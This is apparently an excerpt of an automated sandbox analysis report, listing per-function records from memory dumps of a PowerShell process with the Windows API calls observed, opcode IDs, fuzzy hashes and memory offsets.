                                                    • Instruction ID: e47d95aafb29758affb29142015a4d4bd6676679ffed7610dab4620fc1e54d9e
                                                    • Opcode Fuzzy Hash: e1d20f7ee6ef7e1355b3c3f5e021fe4610d5fb53a035f65d5b6f56f4b943a16f
                                                    • Instruction Fuzzy Hash: 4901A9B65097805FD712CB169C40863FFB8DE87670749C49FEC898B612D226B909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02AC081E, Relevance: .0, Instructions: 27COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2185768103.0000000002AC0000.00000040.00000040.sdmp, Offset: 02AC0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: af4184e8fc4aa6f937df6d787d017844409561bfb84426576ad7c81af1e9e89c
                                                    • Instruction ID: 2efff8ff8f3f4dae355e74dd98809733e1ab840c30efc05c7523d113c3370073
                                                    • Opcode Fuzzy Hash: af4184e8fc4aa6f937df6d787d017844409561bfb84426576ad7c81af1e9e89c
                                                    • Instruction Fuzzy Hash: 1EE092766007008BD750DF0AEC41452F7D4EB84A30B18C07FDC0D8B701D135B505CAA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 02BE086C, Relevance: .0, Instructions: 21COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2186105623.0000000002BE0000.00000040.00000001.sdmp, Offset: 02BE0000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 997379fbb1860dade512c7849025030903461dbb945d6040beeb56eb8e94adc8
                                                    • Instruction ID: 019b1fd3f68993988a1b701a5698a809383d259a2d98da63f24685705b3ad489
                                                    • Opcode Fuzzy Hash: 997379fbb1860dade512c7849025030903461dbb945d6040beeb56eb8e94adc8
                                                    • Instruction Fuzzy Hash: FCE0C22260D3E08BC3175268A46955ABF739FC321874D41EFE093CF252EAA46840D3A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006723F4, Relevance: .0, Instructions: 15COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177703671.0000000000672000.00000040.00000001.sdmp, Offset: 00672000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35e43442a153eb762b0e3f6eaa5a5ed89db6fc51c3d4c1a26e4d1058eec96210
                                                    • Instruction ID: 60c53dfc0f83d6998bf2a83544af459117015703a06afb0a8b2d7f4ade7690f8
                                                    • Opcode Fuzzy Hash: 35e43442a153eb762b0e3f6eaa5a5ed89db6fc51c3d4c1a26e4d1058eec96210
                                                    • Instruction Fuzzy Hash: 4CD05E79204A828FD7168A1CC1A4B9537D5AF55B04F4684F9E844CB7A7C768E9D1D200
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 006723BC, Relevance: .0, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000022.00000002.2177703671.0000000000672000.00000040.00000001.sdmp, Offset: 00672000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d23babe6f47f5ed506b577ee1f33e03e815bc9c29de4c87fd187be4626a7270a
                                                    • Instruction ID: 9816c7c11bfddfce9fea68da10126d828ba363ea52c481ac2ea2f3471eceb0b3
                                                    • Opcode Fuzzy Hash: d23babe6f47f5ed506b577ee1f33e03e815bc9c29de4c87fd187be4626a7270a
                                                    • Instruction Fuzzy Hash: 3AD05E343006828FDB15CA1CC1A4F9973E5AF40710F1684ECBC008B366C3A8EC80C600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Analysis Process: powershell.exe PID: 2760 Parent PID: 1192 powershell.exeCOMMON

                                                    Executed Functions

                                                    Function 0043ACB7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0043AD37
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: d139b4256e5ff9ca98b199ddddb0176e83a0590cf93666e767dd1459f2b96b9e
                                                    • Instruction ID: f3c6ba4c3573a28afe7d391a6d39f1d0fe3ab8bfdf64e1de5a9e4edda32ab505
                                                    • Opcode Fuzzy Hash: d139b4256e5ff9ca98b199ddddb0176e83a0590cf93666e767dd1459f2b96b9e
                                                    • Instruction Fuzzy Hash: 3D21F1761097809FEB228F25DC40B92BFF4EF16310F0884DBE9848B663D2359818DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043ACEE, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 0043AD37
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    • Opcode ID: eb85025b4f49dc269a2a8ea9dfb0145912aea6ecc79f39d69a23a26f299db968
                                                    • Instruction ID: 7253bfd7ebf181a2fadb1ffa491f07cf5a965e0ebc80afee7ba8654dc48ef121
                                                    • Opcode Fuzzy Hash: eb85025b4f49dc269a2a8ea9dfb0145912aea6ecc79f39d69a23a26f299db968
                                                    • Instruction Fuzzy Hash: F3117076500704DFEB20CF55D884B66FBE4EF08321F08C46AED898BA62D335E814DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B2CC, Relevance: 1.6, APIs: 1, Instructions: 50nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0043B329
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: 4066965e827032dd1dd81238e3d76496fbf961c4fe1713a063c672cd869b6e3f
                                                    • Instruction ID: 43c6393c32460dbc80b551557a53384d90fdcd675e5291ad1f02d7f5e0a6a793
                                                    • Opcode Fuzzy Hash: 4066965e827032dd1dd81238e3d76496fbf961c4fe1713a063c672cd869b6e3f
                                                    • Instruction Fuzzy Hash: 29119171509384AFD7228F11DC45B52FFB4EF16310F09C49AED844B653C275A818DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B2EE, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 0043B329
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    • Opcode ID: f0553e901a5e4e8b1e6a0c31e27815bff24ef62d494469cb887ae6f933aef051
                                                    • Instruction ID: 47bf32bf3346870e5fae2c9d42d6eb39e1f7a4600cd87e7b9950f962d20099b6
                                                    • Opcode Fuzzy Hash: f0553e901a5e4e8b1e6a0c31e27815bff24ef62d494469cb887ae6f933aef051
                                                    • Instruction Fuzzy Hash: 5F01AD32400704DFEB208F45D885B26FBA0EF18720F18C09BDE490B616C379A818DBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0118, Relevance: 1.6, APIs: 1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 01FC01D0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    • Opcode ID: 97f1572482c6a8d01d2c50a6a57cf616553beb1e939c315962af9bc0d84e9f2b
                                                    • Instruction ID: f35e4166c4907b4d30159b0a5838547a023c8d7d48c78635bd5a88854b34b71f
                                                    • Opcode Fuzzy Hash: 97f1572482c6a8d01d2c50a6a57cf616553beb1e939c315962af9bc0d84e9f2b
                                                    • Instruction Fuzzy Hash: 9531377650E3C09FE7138B759C65692BFB4AF43210F0E84DBD884CF1A3D6699809DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC067A, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01FC072D
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: dedc8437f00f58115689025b23ae8f026dfec3ec64cae5b26b230f0833a7f78a
                                                    • Instruction ID: 79be1371d6049cf8af8977698e453b9f6f221e9ee3bfb5d6713b51a7aad20fe2
                                                    • Opcode Fuzzy Hash: dedc8437f00f58115689025b23ae8f026dfec3ec64cae5b26b230f0833a7f78a
                                                    • Instruction Fuzzy Hash: 7B317075508380AFE722CF65CD85F52BFF8EF05610F09849EE9889B293D365A809CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0D32, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01FC0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: a8324b14a93170bb0f2c592475a24699a01d6ca5076881df31d57892bbc919ef
                                                    • Instruction ID: 9c2297a08531761a52dc077be07c281401e7bd99414b4992f2bf05acaabcb7b2
                                                    • Opcode Fuzzy Hash: a8324b14a93170bb0f2c592475a24699a01d6ca5076881df31d57892bbc919ef
                                                    • Instruction Fuzzy Hash: B331B6B5509380AFE712CB25DC45B96BFE8DF06610F0884AAE944CB293D675A905CB71
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043BD1E, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: c762f710dd589d2dd946b65379062953388e5743475819d73fb12d67a8135978
                                                    • Instruction ID: 44a6afcce13a9346e921d9d1ec1ee5a0b3ffd110c8b6ce84413852bdec3bbc77
                                                    • Opcode Fuzzy Hash: c762f710dd589d2dd946b65379062953388e5743475819d73fb12d67a8135978
                                                    • Instruction Fuzzy Hash: C831B172109380AFE722CB61CC45F97BFB8EF06310F08849BE984DB192D224A908C7B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AF24, Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    • Opcode ID: 5df59e298e80d14147ac8169ff501a0f356d9d0e1741a5118e0838c4e50f86c8
                                                    • Instruction ID: d7249313c124a4b12fb3833d2d71678e81ce7b82cf03cf90480b3b35b353bc0b
                                                    • Opcode Fuzzy Hash: 5df59e298e80d14147ac8169ff501a0f356d9d0e1741a5118e0838c4e50f86c8
                                                    • Instruction Fuzzy Hash: D221B4B2509780AFE712CF60DC45B96BFB8EF06320F0884DBE985DB193D265A949C771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0FEE, Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 01FC109E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    • Opcode ID: 385d7470af447eb8050d50d8cba01faee27cf64ffc759c6e19fe3ce7a504784b
                                                    • Instruction ID: febb1dbad3e04212259f6db6137cc49173558532a3d4a677e9b7fc697b3e97f6
                                                    • Opcode Fuzzy Hash: 385d7470af447eb8050d50d8cba01faee27cf64ffc759c6e19fe3ce7a504784b
                                                    • Instruction Fuzzy Hash: E3316F7550E3C06FD3138B358C55B66BFB4AF43610F1A81DBD8848F2A3D629A909C7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B01D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: bc52e1f2a951d900af956d88e18344c8c8257d47932d6ef2deb2ef438d8c6d7d
                                                    • Instruction ID: 3cf5c491292284133f1b99e16be44864f8c5cdf5862693a42f79ca61559dec9a
                                                    • Opcode Fuzzy Hash: bc52e1f2a951d900af956d88e18344c8c8257d47932d6ef2deb2ef438d8c6d7d
                                                    • Instruction Fuzzy Hash: 4B219171509380AFE722CB15CC45FA7BFB8EF06320F08849BE945DB152D668A908CBB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A1A8, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 0043A23E
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    • Opcode ID: d3f9ea9f10e8fcf31204777f0d6608f31cd5a36fd4a45a6e6e490fa1bc7bca29
                                                    • Instruction ID: 0bf6c760d15ced29e44ab34385c3fa39d1241fef7ce1e0e794ea8b510954a0f8
                                                    • Opcode Fuzzy Hash: d3f9ea9f10e8fcf31204777f0d6608f31cd5a36fd4a45a6e6e490fa1bc7bca29
                                                    • Instruction Fuzzy Hash: 5421C47184D3C06FD3128B658C55B66BFB4EF47620F1981DBD8848F293D229A919CBA2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0784, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC0819
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: 676e93c9087debcf6a3cb3f9e9e3e3ed7eec9abc0d7b99012a20696c128210ec
                                                    • Instruction ID: dcafc4ad87c39f6e9ba8da9ff2545fb804bc8ee24f22e8326dad9d9a7c68c0c6
                                                    • Opcode Fuzzy Hash: 676e93c9087debcf6a3cb3f9e9e3e3ed7eec9abc0d7b99012a20696c128210ec
                                                    • Instruction Fuzzy Hash: 282107B6408780EFE712CB159C41FA3BFA8EF46720F0881DBF9848B193D224A909D771
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0464, Relevance: 1.6, APIs: 1, Instructions: 77COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 01FC0502
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    • Opcode ID: 392890e4cd31eff5bba90dd27f798841ee38ec1d1bcd138ac9fd3f30e31accfc
                                                    • Instruction ID: 281113c4567c3a48d4f2843a1305142727a415387b84f2653597828152832372
                                                    • Opcode Fuzzy Hash: 392890e4cd31eff5bba90dd27f798841ee38ec1d1bcd138ac9fd3f30e31accfc
                                                    • Instruction Fuzzy Hash: 2B217F7640E3C0AFD3128B758C55B62BFB4EF47610F1A81CBD8848F693D225A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC06AE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 01FC072D
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    • Opcode ID: c2272f6d1f6a831795b314b61e8f306f4025dbcba839c5e0a9e01bb96257c907
                                                    • Instruction ID: f7ceead1d67f038c3b7c081f0bf652229830a1ed0e2c2d49940c090dcbb5cb44
                                                    • Opcode Fuzzy Hash: c2272f6d1f6a831795b314b61e8f306f4025dbcba839c5e0a9e01bb96257c907
                                                    • Instruction Fuzzy Hash: DF21DE75500300EFEB21CF65CD85F66FBE8EF08610F04846EE9488B282D732E804DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0854, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 01FC08E5
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    • Opcode ID: 2773f4d91bd201d87fd117bbc3f9619825934301426f64f10065cd5e44ab4ef8
                                                    • Instruction ID: 85d4e20a73bc4346532a6cf55a3660a3b3becda5e0aa4dd00e3608f2d908d71c
                                                    • Opcode Fuzzy Hash: 2773f4d91bd201d87fd117bbc3f9619825934301426f64f10065cd5e44ab4ef8
                                                    • Instruction Fuzzy Hash: 9621B072409380AFE722CF50DC45F96BFB8EF06710F09849BE9849B193C225A909CB72
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043A8B4, Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 0043A94A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    • Opcode ID: 5da30a88da623f2c82e42cf109145a10b2a68c396e4da54cca08e22fdc690a8e
                                                    • Instruction ID: faeb192609e9f770f79331de51c4b9c96d06ce40e154ad0eca97bbb4f9eca881
                                                    • Opcode Fuzzy Hash: 5da30a88da623f2c82e42cf109145a10b2a68c396e4da54cca08e22fdc690a8e
                                                    • Instruction Fuzzy Hash: 5421A77540D780AFD3138B25DC51B62BFB8EF87710F0981DBE8848B653D224A919C7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0D66, Relevance: 1.6, APIs: 1, Instructions: 71registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 01FC0DD6
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    • Opcode ID: f2cece64ca21701c288dc0e1c7cdfc51fd738e80d4c7e53e6d1e53fc43d67715
                                                    • Instruction ID: fe5a73b4995d829fe1444ec9a115ff89e39fbce8034caac2ed1d582881c64750
                                                    • Opcode Fuzzy Hash: f2cece64ca21701c288dc0e1c7cdfc51fd738e80d4c7e53e6d1e53fc43d67715
                                                    • Instruction Fuzzy Hash: 1321A175500300EFF721DF29CD85BAAFBD8EF04610F04846EF948DB282DA75E905CA61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043BD52, Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    • Opcode ID: 879f9bc779e9dfb06d5b8623be1dc0d096529990035ee7732c815f9c7825902a
                                                    • Instruction ID: 1c5b55fe83413e19f55306b7cd873ef296777ed243c9fda97b2da0f3c1265704
                                                    • Opcode Fuzzy Hash: 879f9bc779e9dfb06d5b8623be1dc0d096529990035ee7732c815f9c7825902a
                                                    • Instruction Fuzzy Hash: 83119D72500704EFEB21CF55DC85FAAFBACEF08320F14856AFA459A641D674A9048BB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043B04A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    • Opcode ID: e990acc5074bb3a2076038d12fec5b5608b36db282d1e72ca6b08470dc2a7e2d
                                                    • Instruction ID: 3fbf73dec62aae4619a1b2931d7cbc8facaa342f84ff618f159f9eeb8dbcfb20
                                                    • Opcode Fuzzy Hash: e990acc5074bb3a2076038d12fec5b5608b36db282d1e72ca6b08470dc2a7e2d
                                                    • Instruction Fuzzy Hash: F0117C71600304EFEB20CF55DC85FABBBE8EF08760F14846AEA09DB241D774E9048AB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC137E, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    • Opcode ID: 3b64029c08542959717411e0512287fbfc4cb2bf3abcdc890ee3882db467cd44
                                                    • Instruction ID: 0bf9e2b3e628657fb8160f43ca317ff885469e44d12e1b9ac0709ef6bcd33c77
                                                    • Opcode Fuzzy Hash: 3b64029c08542959717411e0512287fbfc4cb2bf3abcdc890ee3882db467cd44
                                                    • Instruction Fuzzy Hash: 0921A4725083809FEB22CF65DC45B96FFF4EF06220F08849EED858B563D235A858DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC0F34, Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 01FC0FB0
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    • Opcode ID: 1d8da1e70ed3ede7280566ea4eb5a379f9a085cbff41d52f2e024f46b151da48
                                                    • Instruction ID: e605ad2d80048b33e0c15758e90f87a05cab125601ce78c55251f8a80733240c
                                                    • Opcode Fuzzy Hash: 1d8da1e70ed3ede7280566ea4eb5a379f9a085cbff41d52f2e024f46b151da48
                                                    • Instruction Fuzzy Hash: CD218E7550D3C19FDB138B25DC55B92BFB4EF03214F0C84DAE8888F293D2699849D762
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AAAB, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 0043AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    • Opcode ID: 7fdab5116af58e630119772b3d4d6e7f39c6b53fedc0ec9f589c0f319836e926
                                                    • Instruction ID: 3caba9da44547a5be7ee4c2a4f2f6fee69d4631268f0cc13d3898974f4c831d2
                                                    • Opcode Fuzzy Hash: 7fdab5116af58e630119772b3d4d6e7f39c6b53fedc0ec9f589c0f319836e926
                                                    • Instruction Fuzzy Hash: 0A2160726053809FD721CF25DC44B52FFA8EF56210F0884AAED89DB252D265E818CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043BABE, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleMode
                                                    • String ID:
                                                    • API String ID: 4145635619-0
                                                    • Opcode ID: 8aab86915bfac7a8534c1811d5cd72459577167e6a66f27f9b53acb9af69ab5a
                                                    • Instruction ID: f33d27b6ce852192e2651d964759e44e6d65449653cf7b24b3cb4eb55d1e8e8e
                                                    • Opcode Fuzzy Hash: 8aab86915bfac7a8534c1811d5cd72459577167e6a66f27f9b53acb9af69ab5a
                                                    • Instruction Fuzzy Hash: 6921A1725093C09FEB128B25DC55B92BFE4EF07320F0984DBDD858F263D228A908DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01FC10D4, Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 01FC1148
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2182615301.0000000001FC0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    • Opcode ID: 15d9562b652ba15b91a351411f3af4bec579c5dcaee9ccba13a7270feff080db
                                                    • Instruction ID: ee6d0339c35dce6314b186372aa23bd3bcb8e65f8230f538dc584f70850ff6fe
                                                    • Opcode Fuzzy Hash: 15d9562b652ba15b91a351411f3af4bec579c5dcaee9ccba13a7270feff080db
                                                    • Instruction Fuzzy Hash: D6216D6140D3C4AFD7138B259C54A62BFB4EF57620F0980DBD8848F2A3D2695818D7B2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043AF62, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,9DC60022,00000000,00000000,00000000,00000000), ref: 0043AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000024.00000002.2180811811.000000000043A000.00000040.00000001.sdmp, Offset: 0043A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
